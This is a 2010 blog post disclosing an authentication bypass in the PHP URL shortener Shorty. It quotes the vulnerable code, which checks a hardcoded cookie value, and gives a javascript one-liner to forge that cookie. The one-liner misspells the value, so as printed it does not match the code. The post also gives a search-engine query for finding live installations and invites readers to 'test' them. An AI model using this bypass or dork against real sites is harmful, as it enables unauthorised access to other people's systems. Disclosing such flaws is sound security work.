Skip to content

Shorty Authentication Bypass

by on April 16, 2010
(This post was posted originally at my personal own blog and also featured in the exploit-db.com website)
Today, reading some stuff at internet I have found an article about 7 PHP scripts to generate shorts URLs. This kind of links are very common today with a lot of controversy about the security risk that they implied. I’m not here (now) to discuss about shorting URL’s services but to talk about a stupid bug that I have found in the first (!!!) software that WebResourcesDepot recommend today.
Shorty is a script very old… From 2006. Why are they recommending it in the first place? Second: Did they try to install it? A lot of errors appears when you try a fresh install and some pain until you can fix it. Buggy from the scratch.
I then decided to read some source code. I have found that in functions.php is some bug that we can use to bypass the login form. Let’s go to read some php code:
function authenticate(){
$cookie = @$_COOKIE['snickerdoodle'];
if($cookie == "polarbears"){
//
} else {
exit("Not logged in.");
}
}

function verify(){
if(@$_COOKIE['snickerdoodle']){
$cookie = $_COOKIE['snickerdoodle'];
} else {
$cookie = '';
}
if($cookie == "polarbears"){
return 1;
} else {
return 0;
}
}
As you can read this code generates a cookie with the name “snickerdoodle” and the value “polarbears” to determine if you are authenticated or not. Its very easy to create a new cookie into your browser with this data with some Firefox extension. If you are using a browser without extensions like Google Chrome you can try to write the next javascript sentence into your URL:
javascript:document.cookie=”snickerdoodle=polerbears”;
If you don’t want to install Shorty (and mess around with all the hacks you have to do use it) you can always use the search intitle:”Shorty (Beta)” to found some places to test it.
Have fun!
Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: